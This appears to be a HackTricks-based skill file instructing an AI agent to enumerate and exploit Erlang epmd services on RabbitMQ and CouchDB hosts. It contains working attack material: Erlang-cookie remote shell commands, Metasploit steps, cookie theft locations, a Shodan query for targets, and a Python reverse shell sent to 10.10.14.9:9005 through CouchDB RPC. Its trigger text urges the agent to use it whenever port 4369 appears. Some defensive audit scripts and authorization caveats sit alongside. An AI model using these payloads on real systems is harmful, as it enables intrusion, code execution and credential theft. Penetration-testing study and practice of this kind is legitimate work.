Hacktricks-skills epmd-pentest

Pentest Erlang Port Mapper Daemon (epmd) on port 4369. Use this skill whenever you need to enumerate, assess, or exploit epmd services during security assessments. Trigger this when you see port 4369 open, when working with RabbitMQ or CouchDB installations, when you need to extract Erlang node information, or when attempting cookie-based RCE attacks. Don't forget to use this for any epmd-related reconnaissance or exploitation tasks.

Install

Source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd/SKILL.MD

Source content

EPMD Pentesting Skill

This skill helps you enumerate and exploit the Erlang Port Mapper Daemon (epmd) service, commonly found on port 4369 in RabbitMQ and CouchDB installations.

When to Use This Skill

  • Port 4369 is open during network scanning
  • You're assessing RabbitMQ or CouchDB infrastructure
  • You need to enumerate Erlang node names and ports
  • You have access to an Erlang cookie and want to attempt RCE
  • You're doing distributed Erlang security assessments

Enumeration

Quick Manual Check

Send a raw EPMD query to verify the service is responding:

echo -n -e "\x00\x01\x6e" | nc -vn <TARGET_IP> 4369

This sends a names request (opcode 0x6e = 'n') to epmd. Any response indicates the service is active.

Nmap Enumeration

Use Nmap's epmd-info script for comprehensive enumeration:

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <TARGET_IP>

This reveals:

  • EPMD port number
  • All registered Erlang nodes
  • Port mappings for each node

Example output:

| epmd-info:
|   epmd_port: 4369
|   nodes:
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|_    kazoo-rabbitmq: 25672
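To make the wire format behind the manual check and the Nmap output concrete, here is an added example (not part of the original skill or HackTricks) that builds the same three-byte names request the echo command sends and parses a constructed NAMES_RESP body of the kind epmd returns. It runs fully offline: the response bytes are constructed to match the sample node list above, and the node names and ports are assumptions. The point for a defender is that everything in that table is handed out without authentication, which is why port 4369 should not be reachable from untrusted networks.

```python
import struct

NAMES_REQ = 0x6E  # 'n': ask epmd for every registered node


def build_names_req() -> bytes:
    """Build a NAMES_REQ packet: 2-byte big-endian length followed by the opcode.

    For a one-byte body this is b"\\x00\\x01\\x6e", the payload piped to nc above.
    """
    body = bytes([NAMES_REQ])
    return struct.pack(">H", len(body)) + body


def parse_names_resp(data: bytes):
    """Parse a NAMES_RESP: 4-byte big-endian epmd port, then one text line per node.

    Each line has the form "name <node> at port <port>"; returns (epmd_port, {node: port}).
    """
    if len(data) < 4:
        raise ValueError("NAMES_RESP shorter than the 4-byte port header")
    epmd_port = struct.unpack(">I", data[:4])[0]
    nodes = {}
    for line in data[4:].decode("ascii", errors="replace").splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "name" and parts[2:4] == ["at", "port"]:
            nodes[parts[1]] = int(parts[4])
    return epmd_port, nodes


# Constructed response (assumption): mirrors the sample epmd-info output above.
SAMPLE_RESP = struct.pack(">I", 4369) + (
    b"name bigcouch at port 11502\n"
    b"name freeswitch at port 8031\n"
    b"name ecallmgr at port 11501\n"
    b"name kazoo-rabbitmq at port 25672\n"
)


def exposure_summary(resp: bytes) -> str:
    """One-line finding an assessor can paste into a report."""
    port, nodes = parse_names_resp(resp)
    return f"epmd on {port} exposes {len(nodes)} node(s): " + ", ".join(
        f"{n}:{p}" for n, p in nodes.items()
    )


if __name__ == "__main__":
    print(build_names_req().hex())  # 00016e
    print(exposure_summary(SAMPLE_RESP))
```

The parser ignores any line that does not match the five-token shape, so a truncated or malformed response yields fewer nodes rather than an exception; callers who need strictness can compare the parsed count against the number of newline-terminated lines.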

Erlang Client Enumeration

If you have Erlang installed, you can query node names directly:

# Install Erlang (Ubuntu/Debian)
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
# or
apt-get install erlang

# Start Erlang shell and query
erl
1> net_adm:names('<TARGET_HOST>').

This returns the names and distribution ports of the nodes registered with epmd on the target host.

Erlang Cookie RCE

The Erlang cookie is the authentication mechanism for distributed Erlang. If you can obtain it, you can execute arbitrary code on the target.

Cookie Location

The cookie is typically stored in ~/.erlang.cookie on the target system. It is generated as a random 20-character string [A-Z] on the first Erlang start, and may be configured manually in some deployments.

Remote Code Execution

Once you have the cookie, connect remotely:

erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn

This opens an Erlang shell on the remote system. Execute commands:

(test@target.fqdn)1> os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"

(test@target.fqdn)2> os:cmd("cat /etc/passwd").

Local Privilege Escalation (CouchDB)

If you're already on the system and have the cookie, abuse CouchDB for privilege escalation:

HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE

Then execute commands via RPC:

(anonymous@localhost)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"

(anonymous@localhost)2> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" ]).

Metasploit Exploitation

Metasploit has a module for Erlang cookie RCE:

msfconsole
use exploit/multi/misc/erlang_cookie_rce
set RHOSTS <TARGET_IP>
set ERLANG_COOKIE <YOUR_COOKIE>
set TARGETNAME <node@target>
exploit

Cookie Discovery Techniques

Brute Force

If the cookie is weak or predictable, you can attempt brute force:

  • Use epmd_bf tool (available from security research sources)
  • Try common default cookies
  • Check for cookies in configuration files
  • Look for cookies in environment variables

Information Gathering

Check these locations for exposed cookies:

  • /etc/rabbitmq/erlang.cookie
  • /var/lib/rabbitmq/.erlang.cookie
  • /opt/couchdb/etc/vm.args
  • Application configuration files
  • Environment variables in process listings
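The cookie-location and information-gathering lists above describe where a cookie lives and what a strong one looks like (20 random uppercase letters, owner-readable only). The following added audit script, not part of the original skill or HackTricks, turns those facts into a local hardening check a system owner can run on a RabbitMQ or CouchDB host: it walks the paths listed above, flags cookie files whose mode grants group or other access, and flags values that are short, low-diversity, or a dictionary word. The path list comes from this page; the weak-value list and the diversity threshold are constructed assumptions.

```python
import os
import stat

# Cookie locations taken from the lists above (plus the per-user default path).
COOKIE_PATHS = [
    os.path.expanduser("~/.erlang.cookie"),
    "/var/lib/rabbitmq/.erlang.cookie",
    "/etc/rabbitmq/erlang.cookie",
]

# Constructed list of obviously weak values (assumption, not from the page).
WEAK_VALUES = {"changeme", "secret", "cookie", "erlang", "rabbitmq", "couchdb", "password"}

# Assumption: a 20-character random [A-Z] string almost always has 10+ distinct letters.
MIN_DISTINCT = 10


def audit_cookie_value(cookie: str) -> list:
    """Return a list of findings for a cookie string (empty list means no issue found)."""
    c = cookie.strip()
    findings = []
    if c.lower() in WEAK_VALUES:
        findings.append("cookie is a common/dictionary value")
    if len(c) < 20:
        findings.append(f"cookie length {len(c)} is below the 20 characters Erlang generates")
    if len(set(c)) < MIN_DISTINCT:
        findings.append(f"cookie has fewer than {MIN_DISTINCT} distinct characters")
    return findings


def audit_cookie_mode(mode: int) -> list:
    """Return findings for a cookie file's st_mode; the file should be owner-only (0400)."""
    perm = stat.S_IMODE(mode)
    if perm & (stat.S_IRWXG | stat.S_IRWXO):
        return [f"cookie file mode {oct(perm)} grants group/other access; expected 0o400"]
    return []


def audit_cookie_file(path: str) -> dict:
    """Audit one cookie file on disk: permissions first, then the value if readable."""
    if not os.path.exists(path):
        return {"path": path, "present": False, "findings": []}
    st = os.stat(path)
    findings = audit_cookie_mode(st.st_mode)
    try:
        with open(path, "r", encoding="ascii", errors="replace") as fh:
            findings += audit_cookie_value(fh.read())
    except PermissionError:
        # Unreadable by the auditing user: rerun as the service account to check the value.
        findings.append("value not readable by the auditing user; rerun as the service owner")
    return {"path": path, "present": True, "findings": findings}


if __name__ == "__main__":
    for p in COOKIE_PATHS:
        result = audit_cookie_file(p)
        if result["present"]:
            print(p, "->", result["findings"] or ["OK"])
```

Run it as root or as the rabbitmq/couchdb service user so the value check is meaningful; a mode finding on its own is already worth fixing, because any local user who can read the file holds the only credential distributed Erlang checks.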

Shodan Reconnaissance

Find exposed EPMD services on the internet:

# Shodan query for EPMD services
port:4369 "at port"

This can help identify:

  • Internet-facing EPMD instances
  • Potential targets for assessment
  • Misconfigured services

Safety and Legal Considerations

  • Only test systems you have explicit authorization to assess
  • EPMD exploitation can cause service disruption
  • Document all findings and coordinate with system owners
  • Follow responsible disclosure practices

Practice Environment

The Canape HTB machine provides a safe environment to practice EPMD exploitation techniques.

References